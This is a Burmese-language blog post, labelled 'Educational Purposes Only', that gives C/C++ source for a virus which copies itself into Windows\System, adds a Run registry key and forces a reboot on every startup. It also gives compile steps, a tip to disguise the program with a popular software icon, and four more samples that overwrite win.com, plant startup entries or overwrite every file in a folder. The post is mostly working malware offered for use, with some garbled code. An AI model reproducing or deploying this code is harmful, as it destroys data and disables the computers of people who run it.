အခု example.asm ကိုၾကည့္ ၾကည့္ပါ ၄င္းဟာ ယခုေခတ္အသံုးျပဳေနတဲ႔ virus ေရွ႕ေျပးပံုစံတစ္ခုျဖစ္ပါတယ္။ အဲဒီfile မွာ engine အသံုးျပဳပါတယ္။ engineဟာ external randomer အသံုးျပီး randomer က virus ရဲ႕ main body ကို အသံုးျပဳဖို႔ျပင္ဆင္ျခင္းမွာ data ကိုဖ်တ္ထားတဲ႔ randseed ကိုအသံုးျပဳပါတယ္။ အက်ိဳးရလဒ္ကေတာ့ engine မ်ားဟာ တူညီတဲ႔ rnd() (သို႔) file io functionမ်ား (သို႔) main object နဲ႔တူညီတဲ႔ ၄င္းတို႔ရဲ႕ common structure မွတဆင့္ နည္းလမ္းတစ္ခုျဖင့္ အျခားအသီးသီးကို ေခၚႏိုင္ပါတယ္။

(Educational Purposes Only)

computer startup လုပ္တိုင္း restart ျဖစ္ေစတဲ႔ Virus

ဒီ post မွာ ေဖာ္ျပထားတဲ႔ virus ကေတာ့ computer ကို startup လုပ္တိုင္း restart ျဖစ္ေစပါလိမ့္မယ္။ ဆိုလိုတာကေတာ့ ဒီ virus ကူးစက္ခံရတဲ႔ computer ဟာ system က boot တက္ျပီးတဲ႔ အခါတိုင္းမွာ restart ျဖစ္သြားပါလိမ့္မယ္။ computer က desktop loaded ျပီးတာနဲ႔ reboots ျဖစ္ေနမွာျဖစ္တဲ႔အတြက္ အလုပ္မျဖစ္ေတာ့ပါဘူး။ဒီ virus ကူးစက္ဖို႔အတြက္ doubleclick တစ္ခါလုပ္ဖို႔ပဲလိုက္ပါတယ္။ က်န္တဲ႔ operation အပိုင္းကိုေတာ့ သူ႔ဟာသူဆက္လုပ္သြားႏိုင္ပါတယ္။ ဒါ့အျပင္ ဒီ virus အမ်ိဳးအစားေတြဟာ anti-virus software ကေန virus တစ္ခုအျဖစ္ detect မလုပ္ႏိုင္တဲ႔ အထဲမွာပါ ပါတယ္။
ေအာက္မွာေဖာ္ျပထားတဲ႔ virus source code ေတြကို ေလ့လာၾကည့္ပါ။ C language နဲ႔ အကၽြမ္းတ၀င္ ျဖစ္ျပီး သူေတြအေနနဲ႔အလြယ္တကူပဲ နားလည္ႏိုင္ပါလိမ့္မယ္။

    #include<stdio.h>

    #include<dos.h>

    #include<dir.h>



    int found,drive_no;char buff[128];



    void findroot()

    {

    int done;

    struct ffblk ffblk; //File block structure

    done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

    if(done==0)

    {

    done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

    if(done==0)

    {

    found=1; //means that the system is already infected

    return;

    }

    drive_no=1;

    return;

    }

    done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

    if

    (done==0)

    {

    found=1;return;

    }

    drive_no=2;

    return;

    }

    done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

    if(done==0)

    {

    found=1;

    return;

    }

    drive_no=3;

    return;

    }

    done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

    if(done==0)

    {

    done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

    if(done==0)

    {

    found=1;

    return;

    }

    drive_no=4;

    return;

    }

    else

    exit(0);

    }



    void main()

    {

    FILE *self,*target;

    findroot();

    if(found==0) //if the system is not already infected

    {

    self=fopen(_argv[0],”rb”); //The virus file open’s itself

    switch(drive_no)

    {

    case 1:

    target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

    system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

    break;



    case 2:

    target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

    system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    D:\\windows\\system\\sysres.exe”);

    break;



    case 3:

    target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

    system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    E:\\windows\\system\\sysres.exe”);

    break;



    case 4:

    target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

    system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

    CurrentVersion\\Run \/v sres \/t REG_SZ \/d

    F:\\windows\\system\\sysres.exe”);

    break;



    default:

    exit(0);

    }



    while(fread(buff,1,1,self)>0)

    fwrite(buff,1,1,target);

    fcloseall();

    }



    else

    system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

    }

( မွတ္ခ်က္ - အစိမ္းေရာင္နဲ႔ ျပထားတဲ႔ comment ေတြကို ဖတ္ၾကည့္ရင္နားလည္ေလာက္ပါတယ္။)

၁။ source code ကို ဒီမွာလည္း downlaod ႏိုင္ပါတယ္။



၂။ file ကို download ျပီးသြားရင္ Sysres.C နဲ႔ ေတြ႔ရပါလိမ့္မယ္။
၃။ ဒီ source code file ကို compile လုပ္ဖို႔လိုပါတယ္။ (C program ကို ဘယ္လုိ compile လုပ္မလဲ ဆိုတဲ့ post မွာၾကည့္ပါ။ (သို႔) Dev C++ compilerကို လည္းသံုးႏိုင္ပါတယ္။)

Virus ကုိ သင့္ရဲ႕ PC တြင္ စမ္းသပ္ျခင္း ႏွင့္ ဖယ္ရွားျခင္း

compile လုပ္ျပီးျပီဆိုရင္ ဒီ Virus ကို ဘာမွေၾကာက္လန္႔ေနစရာမလိုပဲ စိတ္ခ်လက္ခ် စမ္းသပ္ႏိုင္ပါတယ္။ စမ္းသပ္ဖို႔အတြက္ Sysres.exe file ကို double click လုပ္ပါ။ ျပီးရင္ system ကို restart လုပ္လိုက္ပါ။ ဒါျပီးရင္ေတာ့ သင့္ရဲ႕ PC ဟာ boot တက္ျပီ: desktop loaded ျဖစ္ျပီးဆိုတာနဲ႔ အလိုအေလွ်ာက္ restart ျဖစ္သြားပါလိမ့္မယ္။ အဲလိုမ်ိဳး ခဏခဏ ျဖစ္ပါလိမ့္မယ္။
စမ္းသပ္လို႔ အားရျပီးဆိုရင္ေတာ့ ဒီ virus ကို ေအာက္ပါအဆင့္မ်ားအတိုင္း ဖယ္ရွားႏိုင္ပါတယ္...

၁။ Reboot ျဖစ္ျပီးတာနဲ႔ SAFE MODE ထဲကိုသြားပါ။
၂။ X:\Windows\System ( X ဆိုတာကေတာ့ C,D,E (သို႔) F ကိုဆိုလိုတာပါ။)
၃။ Sysres.exe ဆိုတဲ႔ နာမည္နဲ႔ file ကို ရွာျပီး delete လုပ္လိုက္ပါ။
၄။ ျပီးရင္ run ထဲမွာ regedit လို႔ရိုက္ျပီး registry editor ထဲမွာ

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run

သို႔သြားပါ။ျပီးရင္ ညာဘက္က pane ထဲမွာ "sres" ဆိုတဲ႔ နာမည္နဲ႔ entry တစ္ခုကိုေတြ႔ပါလိမ့္မယ္။ အဲဒီ entry ကို delete လုပ္လိုက္ပါ။ ဒါဆိုရင္ ဒီ virus ကို ဖယ္ရွားျခင္း ေအာင္ျမင္စြာ ျပီးဆံုးသြားပါျပီ။


Virus အလုပ္လုပ္ျခင္း ေနာက္ကြယ္မွ Logic

virus ရဲ႕ လုပ္ေဆာင္ခ်က္ေတြရဲ႕ ေနာက္ကြယ္မွာရွိတဲ႔ logic(Algorithm) ကို နဲနဲေလာက္ရွင္းျပပါမယ္။ ဒါေပမယ့္ program နဲ႔ ပတ္သတ္တဲ႔ နည္းပညာအေသးစိတ္ကိုေတာ့ မရွင္းပါဘူး ။

LOGIC:
၁။ ပထမဆံုး virus က Root partation( Windows ကို install လုပ္ထားတဲ႔ partation) ကို လိုက္ရွာပါတယ္။
၂။ ေနာက္တဆင့္အေနနဲ႔ Virus က သူရဲ႕ file ေတြကို X:\Windows\System ထဲမွာ copy ကူးျပီးျပီလား( ကူးစက္ျပီးျပီလား) မကူးရေသးဘူးလား ဆိုတာကို ဆံုးျဖတ္တြက္ခ်က္ပါတယ္။
၃။ copy မလုပ္ရေသးဘူးဆိုရင္ေတာ့ X:\Windows\System ထဲမွာ သူ႔ကိုယ္သူ copy လုပ္ျပီး startup ေပၚမွာ virus file ကိုထည့္ႏိုင္ဖို႔အတြက္ registry entry တစ္ခုကိုျပဳလုပ္ပါလိမ့္မယ္။
၄။ ဒါမွမဟုတ္လို႔ X:\Windows\System ထဲမွာ virus ကိုေတြ႔မယ္ဆိုရင္ေတာ့ ၄င္းက computer ကို restart လုပ္ဖို႔ command ေပးပါလိမ့္မယ္။

ဒီ process က PC restart ျဖစ္ျပီးတဲ႔အခါတိုင္းမွာ ျဖစ္ေနပါလိမ့္မယ္။

မွတ္ခ်က္ - အကယ္၍ Sysres.exe ကို double click လုပ္ျပီးလို႔မွာ restart ျဖစ္မသြားဘူးဆိုရင္ ဒီ restarting process ဟာ system ရဲ႕ ေနာက္ထပ္ boot ေတြမွာ ျဖစ္ပါလိမ့္မယ္။

ဒီ virus exe fiie ရဲ႕ icon ကို အခုေလာေလာဆယ္ popular ျဖစ္ေနတဲ႔ software တစ္ခုရဲ႕ icon ပံုစံနဲ႔ ေျပာင္းလိုက္မယ္ဆိုရင္ ... ရွယ္ျဖစ္သြားျပီးေပါ့ေနာ္။ (EXEဖိုင္ရဲ႕ icon ပံုစံကိုဘယ္လိုေျပာင္းမလဲ ဆိုတဲ႔ post မွာၾကည့္ပါ။ )

(Educational Purposes Only

Virus နမူနာမ်ား

Virus Sampleမ်ား ကို တင္ေပးလိုက္ပါတယ္...။ Virus ေလ့လာသူမ်ားအေနနဲ႔ အသံုး၀င္မယ္ထင္ပါတယ္။ ေလ့လာၾကည့္ပါ...

Virus နမူနာ (၁)

#include <iostream.h>

#include <conio.h>

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sysstat.h>

#include <io.h>

#include <string.h>



int main(void)

{

clrscr();

int handle;

char string[1000];

int length, res,i;

/*

Create a file named "DOVE.GIF" in the current directory and write

a string to it. If "DOVE.GIF" already exists, it will be overwritten.

*/



if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |

O_TRUNC,

S_IREAD | S_IWRITE)) == -1)

{

printf("Error opening file.

");

exit(1);

}



strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This

execution currupt your WINDOWS !!!!!!</html>

");

length = strlen(string);

if ((res = write(handle, string, length)) != length)

{

printf("Error writing to the file.

");

getch();

exit(1);

}

printf("

Wrote %d bytes to the file.

", res);

cout<<"



Hello !!!!!!!!";

cout<<"

This is a VIRUS ATTACK !!!";

cout<<"

This execution currupt your WINDOWS !!!!!!

";

close(handle);

getch();

return 0;

}

Virus နမူနာ (၂)

    #include<iostream.h>

    #include<conio.h>

    #include<dos.h>

    #include<stdio.h>

    #include<process.h>

    #include<graphics.h>

    #include<fstream.h>

void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGE

void main()

    {

    clrscr();

    for(int i=0;i<=100;i++)

    {



    textcolor(YELLOW+BLINK);

    gotoxy(35,12);

    cprintf("VIRUS LOADING");

    gotoxy(39,15);

    textcolor(GREEN);

    cout<<i<<"%";

    delay(75);

    clrscr();

    }

    delay(100);

    clrscr();

    fflush(stdout);

    gotoxy(20,12);

    cout<<" 'TOURNIQUET' VIRUS CREATED BY PROCRAETORIAN";

    gotoxy(20,14);

    cout<<" SAY GOOD BYE TO YOUR PC IN ";

    for(int j=5;j<=0;j--)

    {

    gotoxy(48,14);

    cout<<j<<" SECONDS";

    delay(1000);

    }

    ofstream f1;

    f1.open("c:/windows/All Users/desktop/procraetorian.sys");

    ofstream f3("c:/windows/All Users/desktop/blast.sys");

    ofstream a2("c:/windows/All Users/desktop/mslaugh.exe");

    ofstream s2("c:/windows/All Users/desktop/backdoor.sys");

    ofstream g2("c:/windows/All Users/desktop/spin32_war.sys");

    ofstream h2("c:/windows/All Users/desktop/russpatr.sys");

    ofstream j2("c:/windows/All Users/desktop/torr_sys32.sys");

    ofstream k2("c:/windows/All Users/desktop/xxx.sys");

    ofstream l2("c:/windows/All Users/desktop/i.txt");

    ofstream sm("c:/windows/All Users/desktop/am.txt");

    ofstream d1("c:/windows/All Users/desktop/your.txt");

    ofstream d2("c:/windows/All Users/desktop/worst.txt");

    ofstream d3("c:/windows/All Users/desktop/night.txt");

    ofstream d4("c:/windows/All Users/desktop/mare.txt");

    clrscr();

    lowvideo();

    cout<<"

    1.HARD-DISK CORRUPTION

    :";

    delay(4000);

    cout<<"completed";

    cout<<"

    2.MOTHER BOARD CORRUPTION

    :";

    delay(4000);

    cout<<"completed";

    cout<<"


    3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND

    :";

    delay(4000);

    cout<<"completed";

    cout<<"

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";

    delay(3000);

    rename("VIRUS.EXE","C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE");

    //ffool();

    }

    //*END OF MAIN*//

    //*START OF ffool()*//

    void ffool()

    {

    clrscr();

    int g=DETECT,h;

    initgraph(&g,&h,"\tc\bgi\");

    cleardevice();

    delay(1000);

    setcolor(2);

    settextstyle(1,0,1);

    delay(1000);

    setbkcolor(BLUE);

    highvideo();

    outtextxy(50,150,"THE PROCRAETORIAN:");

    delay(1500);

    outtextxy(50,200,"YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS

    HOST");

    outtextxy(50,250,"PEA(C)E BE WITH YOU ! ! !");

    getch();

    delay(4000);

    closegraph();

    exit(0);

    }

Virus နမူနာ (၃)

#include<iostream.h>

#include<conio.h>

#include<.h>

#include<stdio.h>

#include<process.h>

#include<graphics.h>

#include<fstream.h>



void fool();

void main()

{

clrscr();

for(int i=0;i<=100;i++)

{

textcolor(YELLOW+BLINK);

gotoxy(35,12);

cprintf("VIRUS LOADING");

gotoxy(39,15);

textcolor(GREEN);

cout<<i<<"%";

delay(75);

clrscr();

}

delay(100);

clrscr();

flushall();

gotoxy(20,12);

cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SANDEEP";

gotoxy(20,14);

cout<<"SAY GOOD BYE TO YOUR PC IN ";

for(int j=10;j>=0;j--)

{

gotoxy(48,14);

cout<<j<<" SECONDS";

delay(1000);

}

clrscr();

cout<<"

1.HARD-DISK CORRUPTION: ";

delay(4000);

cout<<"completed";

cout<<"



2.MOTHER BOARD CORRUPTION: ";

delay(4000);

cout<<"completed";

cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";

delay(4000);

cout<<"completed";

cout<<"



PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";

delay(3000);

cout<<"

VIRUS.EXE";

delay(2000);

cout<<"

*************************";

cout<<"

Buddy it's a simply joke ";

cout<<"

*************************";

delay(4000);

cout<<"

**********************************";

cout<<"

For Real Virus ";

cout<<"

Contact Me: Sandeep Udaipur ";

cout<<"

Mo: 010101010101 ";

cout<<"

Email: sandeep@yahoo.co.in ";

cout<<"

**********************************";

delay(10000);

}

void fool()

{

clrscr();

int g=DETECT,h;

initgraph(&g,&h,"c:\tc\bgi");

cleardevice();

delay(1000);

setcolor(2);

settextstyle(1,0,1);

delay(1000);

setbkcolor(BLUE);

getch();

delay(4000);

closegraph();

exit(0);

}
Virus နမူနာ (၄)

#include<stdio.h>

#include<dos.h>

#include<dir.h>

#include<fcntl.h>

#include<conio.h>

void main(int argc,char* argv[])

{ char buf[512];

int source,target,byt,done;

struct ffblk ffblk;

clrscr();

textcolor(2);

cprintf("--------------------------------------------------------------------------");

printf("\nVirus: Pagal Shum :p 1.0\nProgrammer:shumaila jaffer\n");

cprintf("--------------------------------------------------------------------------");

done = findfirst("*.*",&ffblk,0);

while (!done)

{ printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Logicbomb");

source=open(argv[0],O_RDONLY|O_BINARY);

target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);

while(1)

{byt=read(source,buf,512);

if(byt>0)

write(target,buf,byt);

else

break;

}

close(source);

close(target);

done = findnext(&ffblk);

}

getch();

}

(Educational Purposes Only)

Category

Tags

Post Top Ad

Pages - Menu

Pages - Menu

Popular Posts

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. ထီဖိုးစံ (စော) - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger